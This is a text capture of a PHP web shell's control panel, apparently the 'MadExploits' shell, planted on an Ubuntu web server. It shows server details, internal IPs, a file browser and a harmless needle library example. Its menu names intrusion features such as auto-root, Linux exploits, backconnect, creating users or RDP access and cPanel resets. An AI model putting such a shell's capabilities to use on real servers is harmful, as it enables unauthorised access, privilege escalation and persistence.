Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
needle /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
deflated-stream.js
524
B
-rw-rw-r--
digest-auth.js
325
B
-rw-rw-r--
download-to-file.js
583
B
-rw-rw-r--
multipart-stream.js
531
B
-rw-rw-r--
parsed-stream.js
535
B
-rw-rw-r--
parsed-stream2.js
669
B
-rw-rw-r--
stream-events.js
538
B
-rw-rw-r--
stream-to-file.js
360
B
-rw-rw-r--
upload-image.js
1010
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stream-events.js
var needle = require('./..'); var resp = needle.get('google.com', { follow_max: 10, timeout: 5000 }); resp.on('readable', function() { var chunk; while (chunk = this.read()) { console.log('Got ' + chunk.length + ' bytes'); } }) resp.on('headers', function(headers) { console.log('Got headers', headers); }) resp.on('redirect', function(url) { console.log('Redirected to url ' + url); }) resp.on('done', function(err) { console.log('Finished. No more data to receive.'); if (err) console.log('With error', err) })
Close